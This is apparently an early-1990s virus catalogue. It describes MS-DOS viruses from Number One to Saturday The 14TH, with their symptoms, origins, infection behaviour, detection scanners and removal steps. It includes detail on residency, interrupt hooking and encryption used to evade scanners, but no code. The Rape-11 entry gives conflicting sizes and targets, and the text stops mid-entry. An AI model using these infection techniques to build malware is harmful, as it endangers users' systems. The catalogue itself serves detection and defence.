Type Code: ONC - Overwriting Non-Resident .COM Infector Detection Method: Removal Instructions: Scan/D or Delete infected files General Comments: The Number One Virus was submitted for inclusion in this listing in September, 1990. This virus, however, is not a new virus but is an extinct rather "old" virus. The Number One Virus was written in October, 1987, by M. Vallen using Turbo Pascal 3.01A. It is documented, complete with source, in a book by Ralf Burger. This virus is an non-resident overwriting virus which infects .COM files. When a program infected with the Number One Virus is executed, the virus will infect the first uninfected .COM file it finds in the current directory. If the .COM file was originally less than 12,032 bytes in length, it will now have a 12,032 bytes. Infected files will also have their date/timestamps in the directory changed to reflect the time of infection. After Number One has finished infecting a .COM file, it will display the message: "This File Has Been Infected by Number One! XXXXXXXX.COMinfected." The XXXXXXXX is the name of the .COM file that has just been infected by the virus. When there are no more .COM files for Number One to infect in the current directory, it will display the following message: "This File Has Been Infected by Number One! <Smile>" Number One will not infect any files which have the Read Only Attribute set. Since Number One is an overwriting virus, it is not possible to remove the virus from infected files and repair the damage. Infected files should be erased and replaced with clean copies. Virus Name: Ohio Aliases: V Status: Common Discovered: June, 1988 Symptoms: BSC, Resident TOM Origin: Indonesia Eff Length: N/A Type Code: RtF - Resident Floppy Boot Sector Infector Detection Method: ViruScan, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: MDisk, F-Prot, VirexPC, Pro-Scan 1.4+, or DOS SYS Command General Comments: The Ohio virus is a memory resident boot sector infector, only infecting 360K floppy disks. The Ohio virus is similar in many respects to the Den Zuk virus, and is believed to possibly be the earlier version of Den Zuk. A diskette infected with Ohio will be immune to infection by the Pakistani Brain virus. The following text strings appear in the Ohio virus: "V I R U S b y The Hackers Y C 1 E R P D E N Z U K 0 Bandung 40254 Indonesia (C) 1988, The Hackers Team...." Also see: Den Zuk Virus Name: Ontario Aliases: V Status: Rare Discovered: July, 1990 Symptoms: .COM & .EXE growth; decrease in system and free memory; hard disk errors in the case of extreme infections Origin: Ontario, Canada Eff Length: 512 Bytes Type Code: PRtAK - Parasitic Encrypted Resident .COM & .EXE Infector Detection Method: ViruScan V66+, Pro-Scan 2.01+ Removal Instructions: SCAN /D, or Delete infected files General Comments: The Ontario Virus was isolated by Mike Shields in Ontario, Canada in July, 1990. The Ontario virus is a memory resident infector of .COM, .EXE, and overlay files. It will infect COMMAND.COM. The first time a program infected with the Ontario Virus is executed, it will install itself memory resident above the top of system memory but below the 640K DOS boundary. Total system memory and free memory will be decreased by 2,048 bytes. At this time, the virus will infect COMMAND.COM on the C: drive, increasing its length by 512 bytes. Each time an uninfected program is executed on the system with the virus memory resident, the program will become infected with the viral code located at the end of the file. For .COM files, they will increase by 512 bytes in all cases. For .EXE and overlay files, the file length increase will be 512 - 1023 bytes. The difference in length for .EXE and overlay files is because the virus will fill out the unused space at the end of the last sector of the uninfected file with random data (usually a portion of the directory) and then append itself to the end of the file at the next sector. Systems using a sector size of more than 512 bytes may notice larger file increases for infected files. Infected files will always have a file length that is a multiple of the sector size on the disk. In the case of extreme infections of the Ontario Virus, hard disk errors may be noticed. Ontario uses a complex encryption routine, and a simple identification string will not identify this virus. Virus Name: Oropax Aliases: Music Virus, Musician V Status: Rare Discovered: December, 1989 Symptoms: .COM growth, tunes Origin: Eff Length: 2,756 - 2,806 bytes, but usually 2,773 bytes Type Code: PRC - Parasitic Resident .COM Infector Detection Method: ViruScan V53+, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: SCAN /D, F-Prot, VirexPC, Pro-Scan 1.4+, VirHunt 2.0+ or delete infected files General Comments: The Oropax virus has had several reports, but wasn't first isolated until December 1989. It infects .COM files, increasing their length by between 2,756 bytes and 2,806 bytes. Infected files will always have a length divisible by 51. The virus may become active (on a random basis) five minutes after infection of a file, playing three different tunes with a seven minute interval in between. One variant recently reported in Europe plays six different tunes at seven minute intervals. Virus Name: Paris Aliases: V Status: Rare Discovery: August, 1990 Symptoms: .COM & .EXE file growth; slow program loads upon execution; Diskette corruption after diskette boot Origin: Paris, France Eff Length: 4,909 Bytes Type Code: PNAK - Parasitic Non-Resident .COM & .EXE Infector Detection Method: ViruScan V66+, Pro-Scan 2.01+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Paris Virus was isolated in Paris, France, in early August, 1990. This virus is a generic infector of .COM, .EXE and overlay files, and will infect COMMAND.COM. It is not memory resident. When a program infected with the Paris Virus is executed, the virus will infect all .COM, .EXE and overlay files on the current drive and directory, with the exception of very small .COM files. It will also check to see if COMMAND.COM on the C: drive is uninfected, if it has not previously been infected it will become infected. Infected files will increase in length by between 4,909 - 4, 25 bytes, with the virus located at the end of the infected file. The Paris Virus can be destructive in some instances, resulting in diskettes becoming corrupted if the system is booted from a diskette with a Paris infected COMMAND.COM program. Virus Name: Parity Aliases: V Status: New Discovered: December, 1990 Symptoms: .COM file growth; long .COM program loads; possibly intermittent parity errors Origin: Bulgaria Eff Length: 441 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Parity Virus was received in December, 1990, and originated in Bulgaria. This virus is a non-memory resident infector of .COM files, and will infect COMMAND.COM. When a program infected with the Parity Virus is executed, the virus will infect all .COM files in the current directory. If COMMAND.COM is in the current directory, it will become infected. Infected .COM programs will increase in length by 441 bytes, the virus being located at the end of the infected program. The program's date and time in the disk directory will not be altered by the virus. The major symptom of a Parity Virus infection is that it will take significantly longer to load and execute infected .COM files. The increase in time is due to the virus searching the current drive for .COM files to infect. This virus may also display a message "PARITY CHECK 2" at times, and halt the system. Virus Name: Payday Aliases: V Status: Rare Discovered: November, 1989 Symptoms: TSR, .EXE & .COM growth, system slowdown, deleted files on Friday EXCEPT 13th, "Black WIndow" Origin: Netherlands Eff Length: 1,808 Bytes (.EXE) & 1,813 Bytes (.COM) Type Code: PRA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V51+, F-Prot, Pro-Scan 1.4+, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: UnVirus, Saturday, CleanUp, F-Prot, Pro-Scan 1.4+ General Comments: The Payday virus was isolated by Jan Terpstra of the Netherlands in November, 1989. It is a variant of the Jerusalem B virus, the major difference being that the activation criteria to delete files has been changed from every Friday The 13th to any Friday but Friday The 13ths. Also see: Jerusalem, Jerusalem B, New Jerusalem, Suriv 3.00 Virus Name: Pentagon Aliases: V Status: Extinct Discovered: January, 1988 Symptoms: TSR, BSC 360k floppies, file (see text) Origin: USA Eff Length: N/A Type Code: RF - Resident Floppy Boot Sector Infector Detection Method: ViruScan, F-Prot, VirexPC Removal Instructions: MDisk, CleanUp, or DOS SYS Command General Comments: The Pentagon virus consists of a normal MS-DOS 3.20 boot sector where the name 'IBM' has been replaced by 'HAL', along with two files. The first file has a name of the hex character 0F9H, and contains the portion of the virus code which would not fit into the boot sector, as well as the original boot sector of the infected disk. The second file is named PENTAGON.TXT and does not appear to be used or contain any data. The 0F9H file is accessed by its absolute storage address. Portions of this virus are encrypted. The Pentagon virus only infects 360K floppies, and will look for and remove the Brain virus from any disk that it infects. It is memory resident, occupying 5K of RAM, and can survive a warm reboot or CTL-ALT-DEL. Virus Name: Perfume Aliases: 765, 4711 V Status: Endangered Discovered: December, 1989 Symptoms: .COM growth, messages Origin: Germany Eff Length: 765 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: Scan/D/X, F-Prot, Pro-Scan 1.4+, VirHunt 2.0+, or delete infected files General Comments: The Perfume virus is of German origin, and has also been isolated in Poland in December, 1989. This virus infects .COM files, and will look for COMMAND.COM and infect it if it isn't already infected. Infected files always grow in length by 765 bytes. The virus will sometimes ask the system user a question, and then not run the infected program unless the system user responds by typing 4711, the name of a German perfume. In the most common variant of this virus, however, the questions have been overwritten with miscellaneous characters. Also see: Sorry Virus Name: Phoenix Aliases: P1 V Status: Rare Discovered: July, 1990 Symptoms: .COM growth, system reboots, CHKDSK program failure, COMMAND.COM header change Origin: Bulgaria Eff Length: 1,704 Bytes Type Code: PRhCK - Parasitic Resident .COM Infector Detection Method: ViruScan V66+, Pro-Scan 2.01+ Removal Instructions: Scan/D, or delete infected files General Comments: The Phoenix virus is of Bulgarian origin, and was submitted to the author of this document in July, 1990 by Vesselin Bontchev. This virus is one of a family of three (3) viruses which may be referred to as the P1 or Phoenix Family. Each of these viruses is being documented separately due to their varying characteristics. The Phoenix virus is a memory resident, generic infector of .COM files, and will infect COMMAND.COM. The first time a program infected with the Phoenix virus is executed, the virus will install itself memory resident in free high memory, reserving 8,192 bytes. Interrupt 2A will be hooked by the virus. System total memory and free memory will decrease by 8,192 bytes. If the program was executed from a floppy drive, and COMMAND.COM was not present on the diskette, the virus will request that a diskette with \COMMAND.COM present be inserted in the drive. Phoenix will immediately infect COMMAND.COM by overwriting part of the binary zero portion of the program, and changing the program's header information. COMMAND.COM will not change in file length. The virus will then similarly infect COMMAND.COM residing in the C: drive root directory. After becoming memory resident, the virus will attempt to infect any .COM file executed. Most of its attempts, however, will not result in a file being infected. Phoenix is a fairly poor replicator. If the virus is successful in infecting the file, it will append its viral code to the end of the file, increasing the file's length by 1,704 bytes. Phoenix is not able to recognize when it has previously infected a file, so it may reinfect .COM files several times. Each infection will result in another 1,704 bytes of viral code being appended to the file. Systems infected with the Phoenix virus will experience problems with executing CHKDSK.COM. Attempts to execute this program with Phoenix memory resident will result in a warm reboot of the system occurring, however the memory resident version of Phoenix will not survive the reboot. If an autoexec.bat file is not present on the drive being booted from, the system will prompt for the user to enter Date and Time. The Phoenix Virus employs a complex encryption mechanism, and virus scanners which are only able to look for simple hex strings will not be able to detect it. There is no simple hex string in this virus that is common to all infected samples. This virus is not related to the Cascade (1701/1704) Virus. Also see: Evil, PhoenixD Virus Name: PhoenixD Aliases: P1 V Status: Rare Discovered: July, 1990 Symptoms: .COM growth, system reboots, CHKDSK program failure, COMMAND.COM header change Origin: Bulgaria Eff Length: 1,704 Bytes Type Code: PRhCK - Parasitic Resident .COM Infector Detection Method: ViruScan V66+, Pro-Scan 2.01+ Removal Instructions: Scan/D, or delete infected files General Comments: The PhoenixD virus is of Bulgarian origin, and was submitted to the author of this document in July, 1990 by Vesselin Bontchev. This virus is one of a family of three (3) viruses which may be referred to as the P1 or Phoenix Family. Each of these viruses is being documented separately due to their varying characteristics. The PhoenixD virus is a memory resident, generic infector of .COM files, and will infect COMMAND.COM. The PhoenixD Virus is a "bug fixed" version of the Phoenix virus. The first time a program infected with the PhoenixD virus is executed, the virus will install itself memory resident in free high memory, reserving 8,192 bytes. Interrupt 2A will be hooked by the virus. System total memory and free memory will decrease by 8,192 bytes. PhoenixD will then check to see if the current drive's root directory contains a copy of COMMAND.COM. If a copy of COMMAND.COM is found, it will be infected by PhoenixD by overwriting part of the binary zero portion of the program, and changing the program's header information. COMMAND.COM will not change in file length. The virus will then similarly infect COMMAND.COM residing in the C: drive root directory. After becoming memory resident, the virus will attempt to infect any .COM file executed. PhoenixD is a much better replicator than the original Phoenix Virus, and is usually able to infect files. Infected files will increase in length by 1,704 bytes. PhoenixD is not able to recognize when it has previously infected a file, so it may reinfect .COM files several times. Each infection will result in another 1,704 bytes of viral code being appended to the file. A characteristic present in the PhoenixD Virus which is not found in the original Phoenix Virus is that in addition to it infecting .COM files as they are executed, .COM files will be infected when they are opened for any reason. The simple act of copying a .COM file with PhoenixD present in memory will result in both the source and target files being infected. Systems infected with the PhoenixD virus will experience problems with executing CHKDSK.COM. Attempts to execute this program with Phoenix memory resident will result in a warm reboot of the system occurring. If an autoexec.bat file is not present on the drive being booted from, the system will prompt for the user to enter Date and Time. The PhoenixD Virus employs a complex encryption mechanism, and virus scanners which are only able to look for simple hex strings will not be able to detect it. There is no simple hex string in this virus that is common to all infected samples. This virus is not related to the Cascade (1701/1704) virus. Also see: Evil, Phoenix Virus Name: Ping Pong Aliases: Bouncing Ball, Bouncing Dot, Italian, Vera Cruz V Status: Extinct Discovered: March, 1988 Symptoms: Graphic display (see text), TSR, BSC Origin: Eff Length: N/A Type Code: RsF - Resident Floppy Boot Sector Infector Detection Method: ViruScan, F-Prot, IBM Scan, VirexPC, Pro-Scan, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: MDisk, CleanUp, F-Prot, Pro-Scan 1.4+, VirexPC, or DOS SYS command General Comments: The Ping Pong virus is a boot sector virus which was first reported in March 1988. The original Ping Pong virus only infects Floppy Disks. When the virus activates, which is on a random basis, a bouncing ball or dot appears on the screen. This display can only be stopped thru a system reboot. No other damage is apparently done. The Ping Pong Virus is extinct, though the hard disk variant, Ping Pong-B listed below, is one of the most common MS-DOS viruses. Virus Name: Ping Pong-B Aliases: Bouncing Ball Boot V Status: Common Discovered: May, 1988 Symptoms: Graphic display (see text), TSR, BSC Origin: Eff Length: N/A Type Code: BRs - Resident Boot Sector Infector Detection Method: ViruScan, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: CleanUp, MDisk, Pro-Scan 1.4+, F-Prot, VirexPC or DOS SYS Command General Comments: The Ping Pong-B virus is a variant of the Ping Pong virus. The major difference is that Ping Pong-B can infect hard disks as well as floppies. Known variants of Ping Pong-B include: Ping Pong-C : Similar to Ping Pong-B, though this variant does not have the bouncing ball screen effect. Origin: Argentina, June 1990. Virus Name: Plastique Aliases: Plastic Bomb, Plastique 3012, Plastique 1 V Status: Rare Discovered: July, 1990 Symptoms: TSR; .COM & .EXE growth; possible system slowdown or bomb noises after September 20 Origin: Taiwan Eff Length: 3,012 Bytes Type Code: PRsA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V66+, Pro-Scan 2.01+ Removal Instructions: Clean-Up V72+, Pro-Scan 2.01+, or Delete infected files General Comments: The Plastique, or Plastic Bomb, Virus was submitted in July 1990, it comes to us from Taiwan. Plastique is a memory resident generic infector of .COM and .EXE files, though it does not infect COMMAND.COM. Unlike the Plastique-B Virus listed below, this virus does not infect floppy disk boot sectors. The first time a program infected with Plastique is executed, the virus will install itself memory resident as a TSR in low system memory. The TSR is 3,264 bytes in length, and hooks interrupt 21. After the virus is memory resident, it will attempt to infect any .COM or .EXE file which is executed. This virus is rather "buggy", and it is not always successful in infecting files when they are executed. When it is successful infecting the file, the file's length will increase. For infected .COM files, the length will increase by 3,012 bytes. For infected .EXE files, their length will increase between 3,012 and 3,020 bytes. Plastique will also attempt to infect files when they are opened for any reason, though again, it is not always successful. After September 20th of any year, the Plastique Virus activates. At that time, it will do either of two things. It will either progressively slowdown the system, or it will intermittently emit "bomb" noises from the system speaker. Known variant(s) of Plastique are: HM2 : The earliest known version of this virus, it does not replicate. Executing an infected file results in the system hanging requiring a reboot. Origin: Taiwan, May 1990. Plastique 4.51 : A variant of the Plastique virus described above, the only real difference is that the encryption of the virus is slightly different. Otherwise it behaves exactly the same as Plastique. Origin: Taiwan, July 1990. Plastique COBOL: A variant of the Plastique virus described above, this version is 3,004 bytes in length, and its memory resident TSR is 3,248 bytes in length. The only text character string which can be found in this variant is "COBOL". This string does not occur in other variants of the Plastique Virus, or related viruses. Infected .COM programs will increase in size by 3,004 bytes, .EXE files by 3,004 to 3,019 bytes. COMMAND.COM will not become infected. Activation of the virus has also been altered. Between January 1 and September 21, the virus will progressively slowdown the system. After 20 minutes, the system will execute at approximately 50% of its original speed. After 30 minutes, the virus may lockout the system keyboard, as well as corrupt the system's CMOS configuration. Between September 22 and December 31, the virus does not activate, and no system slowdown or CMOS corruption will occur. Also see: Invader, Plastique-B Virus Name: Plastique-B Aliases: Plastic Bomb, Plastique 5.21, Plastique 2 V Status: Rare Discovered: July, 1990 Symptoms: TSR, .COM & .EXE file growth; BSC; Origin: Taiwan Eff Length: 4,096 Bytes Type Code: PRsAB - Parasitic Resident .COM & .EXE, & Boot Sector Infector Detection Method: ViruScan V66+, Pro-Scan 2.01+ Removal Instructions: Clean-Up V72+, Pro-Scan 2.01+, or Delete Infected Files General Comments: The Plastique-B, or Plastique 5.21, virus is a later version of the Plastique virus. Like Plastique, it is a memory resident generic infector of .COM and .EXE files. This version will also infect diskette boot sectors. It does not infect COMMAND.COM. If the system date is before September 20th, the first time a program infected with Plastique-B is executed, the virus will install itself memory resident as a TSR in low system memory. The TSR is 5,120 bytes in length. Interrupts 08, 09, 13, 21, and ED are hooked by the virus. If the system date is after September 20th, the virus will install itself memory resident in high system memory but below the 640K DOS boundary. The same interrupts will be hooked by the virus. After the virus is memory resident, it will attempt to infect any .COM or .EXE file which is executed or opened for any reason. It has had many of the "bugs" fixed that were in Plastique, and is usually successful in infecting files. Infected .COM and .EXE files will increase in length by 4,096 bytes. Plastique-B will also infect the boot sector of any diskettes accessed on an infected system. After September 20th, 1990, the Plastique-B virus activates. It will either progressively slowdown the system or cause "bomb" noises to be emitted periodically from the system speaker. It may also overwrite the contents of all drives after this date, depending on if a predetermined limit in the virus has been reached. Also see: Plastique, Invader Virus Name: Polimer Aliases: Polimer Tapeworm V Status: Rare Discovered: November, 1990 Symptoms: .COM growth; Message Origin: Hungary Eff Length: 512 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V71+, Pro-Scan 2.01+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Polimer Virus was discovered in Hungary in November, 1990. This virus is a non-resident infector of .COM files, including COMMAND.COM. When a program infected with the Polimer Virus is executed, the following message will be displayed: "A le' jobb kazetta a POLIMER kazetta ! Vegye ezt !" This message can be found near the beginning of all infected files. After the message is displayed, the virus will attempt to infect one .COM file on the current drive and directory, and one .COM file on the C: drive's current directory. This virus will only infect .COM files which are between 512 and 64,758 bytes in length. If the .COM file it attempts to infect has the Read-Only attribute, it will not be infected, and the message $ERROR will be displayed. Although this virus is actually 456 bytes in length, infected .COM files will increase in size by 512 bytes with the virus's code being located at the beginning of the file. This virus does not appear to do anything besides replicating. Virus Name: Polish 217 Aliases: 217, Polish Stupid V Status: Rare Discovered: October, 1990 Symptoms: .COM growth; system reboot Origin: Koszalin, Poland Eff Length: 217 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V71+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Polish 217, or Polish Stupid, Virus was discovered in Koszalin, Poland, in October, 1990. This virus is a non-resident infector of .COM files, including COMMAND.COM. When a program infected with the Polish Stupid Virus is executed, the virus will infect the first uninfected .COM file found in the current directory. Infected .COM files will increase in length by 217 bytes with the virus's code being located at the end of the file. Infected files will also end with the hex string 5757h. The file's date and time in the disk directory is not altered. A side note on this virus: when the copy of COMMAND.COM pointed to by the COMSPEC environmental variable is infected by the virus, the system will experience a warm reboot. This virus does nothing besides replicating in its current version. Known variant(s) of Polish 217 are: Polish 217 B : The Polish 217 B variant's major difference is that when COMMAND.COM is infected, a warm reboot does not occur. Execution of COMMAND.COM will result in the error message: "Specified COMMAND search directory bad". Execution of infected programs may also result in the following message being displayed and the program terminated: "????????COM Path not found." Programs which can detect Polish 217 may not be able to detect Polish 217 B as it has been altered. Scan V72 and below will not detect it. Virus Name: Polish 529 Aliases: 529 V Status: Rare Discovered: September, 1990 Symptoms: .COM growth; TSR Origin: Poland Eff Length: 529 Bytes Type Code: PRsCK - Parasitic Resident .COM Infector Detection Method: ViruScan V71+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Polish 529 Virus was isolated in September, 1990 in Poland. This virus is a memory resident infector of .COM files. It will infect COMMAND.COM if it is executed with the virus in memory. The first time a program infected with the Polish 529 Virus is executed, the virus will install itself memory resident as a low system memory TSR of 1,664 bytes. Interrupt 21 will be hooked by the virus. Once the virus is memory resident, any .COM file over approximately 1600 bytes in length will be infected by the virus. Infected .COM files will show a file length increase of 529 bytes and have the virus's code located at the beginning of the file. This virus does not appear to do anything but replicate. Virus Name: Polish 583 Aliases: V Status: Rare Discovered: December, 1990 Symptoms: .COM file growth Origin: Poland Eff Length: 583 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Polish 583 Virus originated in Poland and was submitted in December, 1990. This virus is a non-resident, direct action infector of .COM files, including COMMAND.COM. When a program infected with Polish 583 is executed, the virus will infect one other .COM file on the current drive and directory. The newly infected program will increase in length by 583 bytes with the virus's code being located at the end of the infected program. The program's date and time in the disk directory is not altered. This virus does not do anything besides replicate. Virus Name: Print Screen Aliases: EB 21, 8290, PRTSC Virus V Status: Rare Discovered: November, 1989 Symptoms: BSC, hard disk access slowdown Origin: Bombay, India Eff Length: N/A Type Code: BR - Resident Boot Sector Infector Detection Method: ViruScan V64+, Pro-Scan 1.4+, VirexPC, F-Prot 1.12+, VirHunt 2.0+ Removal Instructions: M-Disk, Pro-Scan 1.4+, or DOS SYS Command General Comments: The Print Screen Virus was isolated in Bombay, India in November, 1989 by Neville Bulsara. It is the first virus to have originated in India. There are two versions of Print Screen, the later version having had some bugs fixed. When a system is booted from a Print Screen infected diskette or hard drive, the virus will install itself memory resident in the top of memory. The virus then adjusts the amount of memory DOS thinks is installed. Infected systems will show that total system memory is 2K less than is installed. On floppy disks, the original boot sector of the diskette will be copied to sector 11. After becoming memory resident, the virus will infect any hard disk or floppy diskette which is accessed by the system. Infected system users will notice that hard disk accesses done for any reason will be much slower than expected. In some cases, listing the root directory will show apparently garbage entries in it. These entries are actually part of the virus's code. The first version of the Print Screen virus is buggy, and as such it doesn't actually accomplish anything having to do with printing screens. This virus appears to have been based on the Ping Pong Virus, and some anti-viral programs will identify it as such. Known variant(s) of Print Screen are: Print Screen-2: Print Screen-2 is the later, bug fixed version of the Print Screen Virus. This version will attempt to perform a screen print or dump to the system's printer after every 255 disk I/Os have occurred. Virus Name: Proud Aliases: V1302, P1 Related V Status: Rare Discovery: August, 1990 Symptoms: .COM growth; decrease in total system and available memory; FAT entry corruption Origin: Bulgaria Eff Length: 1,302 Bytes Type Code: PRtCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V71+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Proud, or V1302, Virus was isolated in August of 1990 in Bulgaria by Vesselin Bontchev. Proud is a memory resident infector of .COM files, including COMMAND.COM. The first time a program infected with Proud is executed, the virus checks to determine if interrupt 13 is in use by another program, and if it is, the virus will hang the system. If interrupt 13 is not in use by another program, Proud will install itself memory resident at the top of system memory, but below the 640K DOS boundary. Total system memory and free available memory will decrease by 8,192 bytes. Interrupt 2A will be replaced by the virus. Once the virus is memory resident, it will infect .COM files within certain candidate length ranges whend they are openned for any reason. The candidate file length ranges are: 2,048 - 14,335 bytes 16,384 - 30,719 bytes 32,768 - 47,103 bytes 49,152 - 63,487 bytes Proud is an encrypted virus, and is unusual in that it "splits" the .COM file being infected into two parts, placing the viral code between the two sections. Proud also is unable to distinguish when a file has been previously infected, so .COM files can become infected multiple times. Each infection, with the exception of COMMAND.COM, will add 1,302 bytes to the file length. Infected COMMAND.COM files generally don't increase in length on the first infection as the virus will overwrite part of the 00h area of COMMAND.COM with the viral code. Proud can be a damaging virus, with a probability of 1 out of 256, it may swap entries in the file allocation table. Virus Name: Rape-11 Aliases: Raper/Disk Raper V Status: New Discovery: October, 1991 Symptoms: decrease in system and available memory; file date/time changes; decrease in CPU speed. Origin: Unknown Eff Length: 830 Bytes Type Code: PRhCK - Parasitic Resident .COM Infector Detection Method: Proscan Removal Instructions: Scan/D, or Delete infected files General Comments: The Rape-11 Virus is an 783 byte memory resident infector of .COM files, including COMMAND.COM and .EXE files . It was submitted in October, 1991, and it's origin is unknown. The first time a program infected with Rape-11 is executed, the virus will install itself memory resident at the top of system memory but below the 640K DOS boundary. The interrupt 12 return is not moved. The DOS ChkDsk command will indicate that total system memory and available free memory have decreased by 750 bytes. Interrupt 21 will be hooked by the virus. Once Rape-11 is memory resident, any .COM or .EXE program executed will become infected by the virus. If COMMAND.COM is executed, it will be infected. Infected .COM and .EXE programs will have their file length increased by 783 bytes, and their date and time in the disk directory will have been altered to the system date and time when infection occurred. The virus will be located at the end of the infected program. Virus Name: Red Diavolyata Aliases: USSR 830 V Status: Rare Discovery: December, 1990 Symptoms: .COM growth; decrease in system and available memory; file date/time changes Origin: USSR Eff Length: 830 Bytes Type Code: PRhCK - Parasitic Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Red Diavolyata Virus is an 830 byte memory resident infector of .COM files, including COMMAND.COM. It was submitted in December, 1990, and originated in the USSR. The first time a program infected with Red Diavolyata is executed, the virus will install itself memory resident at the top of system memory but below the 640K DOS boundary. The interrupt 12 return is not moved. The DOS ChkDsk command will indicate that total system memory and available free memory have decreased by 960 bytes. Interrupt 21 will be hooked by the virus. Once Red Diavolyata is memory resident, any .COM program executed will become infected by the virus. If COMMAND.COM is executed, it will be infected. Infected .COM programs will have their file length increased by 830 bytes, and their date and time in the disk directory will have been altered to the system date and time when infection occurred. The virus will be located at the end of the infected program. The following text strings can be found at the end of infected programs: "Eddie die somewhere in time" "This programm was written in the city of Prostokwashino" "(C) 1990 RED DIAVOLYATA" "Hello! MLTI!" Additionally, the text string "MLTI!COMMAND" can be found within infected files. It is unknown if Red Diavolyata does anything besides replicate. Virus Name: RPVS Aliases: 453 V Status: Endangered Discovery: August, 1990 Symptoms: .COM growth Origin: West Germany Eff Length: 453 Bytes Type Code: PNC - Parasitic Non-Resident .COM Infector Detection Method: Pro-Scan 2.01+ Removal Instructions: Pro-Scan 2.01+, or Delete infected files General Comments: The RPVS, or 453, Virus was discovered in West Germany in early August, 1990. This virus is a non-resident infector of .COM files. The RPVS is named for an unusual string that appears in a file dump of the virus - "TUQ.RPVS" - this in not really a text string, but a series of PUSH instructions. The RPVS Virus is rather unsophisticated virus. Whenever a .COM program infected with the RPVS or 453 virus is executed, the virus will look for an uninfected .COM file in the current directory. The virus determines if the .COM file has been previously infected by checking to see if the last two bytes of the file are 9090h. If the last two bytes are not 9090h, the file will be infected, appending 453 bytes of viral code to the end of the file. One .COM file is infected each time an infected program is executed. COMMAND.COM will not normally be infected. This virus does not contain any logic to activate and cause damage in its current state. It does contain many NOP instructions and odd jumps which leave plenty of space for later additions. Known variant(s) of RPVS are: RPVS-B : The RPVS virus after additional bytes have been added to the end of an infected program. When this occurs, the virus will act differently. It will not be able to determine that it has already infected a .COM file, so it will reinfect the first .COM file it finds in the current directory over and over again. Virus Name: Saddam Aliases: V Status: New Discovery: January, 1991 Symptoms: .COM growth; Message; Disk boot failures; I/O error message; "Insufficient memory" message when attempting to run .BAT files; Dir command errors; System hangs Origin: France (reported September, 1990) Isolated: Israel Eff Length: 919 Bytes Type Code: PRsCK - Resident Parasitic .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Saddam Virus was first reported in France in September, 1990. In January, 1991, the first sample of this virus was actually received, its isolation point was Israel. Saddam is a memory resident infector of .COM files, including COMMAND.COM. It is based on the Do-Nothing virus. The first time a program infected with the Saddam Virus is executed, the virus will install itself memory resident in low system memory, though not as a TSR. Interrupts 21 and 22 will be hooked by the virus. COMMAND.COM will be infected at this time if it has not previously been infected. Once Saddam is memory resident, it will infect .COM programs as they are executed or openned. Infected .COM files will have a file length increase of 919 bytes, the virus will be located at the end of infected programs. Programs infected with this virus will not have their file date and time altered upon infection. There are several symptoms which may be experienced on systems infected with the Saddam Virus. The most obvious symptom is that the following message will occasionally be displayed: "HEY SADAM LEAVE QUEIT BEFORE I COME" This message cannot be seen in infected files, it is encrypted. Other symptoms are that attempts to execute .BAT files will result in an insufficient memory message. Attempts to boot from a disk with a Saddam infected COMMAND.COM will fail, the system will hang. Execution of some infected programs will result in an I/O error and the program aborting execution. The DOS Directory command may also not function properly. Lastly, infected systems may experience frequent system hangs requiring the user to reboot the system. Also see: Do-Nothing Virus Name: Saratoga Aliases: 642, One In Two V Status: Extinct Discovery: July, 1989 Symptoms: .EXE growth, Resident, bad sectors, FAT corruption Origin: California, USA Eff Length: 642 Bytes Type Code: PRsE - Resident Parasitic .EXE Infector Detection Method: ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan 1.4+, VirexPC, VirHunt 2.0+ Removal Instructions: Scan/D/X, F-Prot, VirexPC, Pro-Scan 1.4+, VirexPC 1.1B+, VirHunt 2.0+, or delete infected files General Comments: The Saratoga Virus was first isolated in California in July 1989. This virus is very similar to the Icelandic and Icelandic-II viruses, so only the differences from the Icelandic viruses are indicated here. Please refer back to the description of the Icelandic virus for the base information. The Saratoga virus's main difference from the Icelandic virus is that when it copies itself to memory, it modifies the memory block so that it appears to belong to the operating system, thus avoiding another program reusing the block. Similar to the Icelandic-II virus, the Saratoga can infect programs even if the system has installed an anti-viral TSR which "hooks" interrupt 21, such as FluShot+. Also like Icelandic-II is that this virus can infect programs which have been marked Read-Only, though it does not restore the Read-Only attribute to the file afterwards. Also see: Icelandic, Icelandic-II Virus Name: Saturday The 14TH Aliases: Durban V Status: Rare Discovered: March, 1990 Symptoms: TSR;.COM, .EXE, .OV? growth; corrupts boot sector, FAT. & partition table on Saturday 14th Origin: Republic of South Africa Eff Length: 685 Bytes Type Code: PRA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V61+, Pro-Scan 1.4+, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: Scan/D, VirHunt 2.0+, Pro-Scan 2.01+ General Comments: The first reports of the Saturday The 14TH virus came from South Africa in March 1990. The Saturday The 14TH, or Durban Virus, is a memory resident generic file infector, infecting .COM, .EXE, and overlay files, but not COMMAND.COM. Infected files will increase in length by between 669 and 684 bytes. The Saturday The 14TH virus activates on any 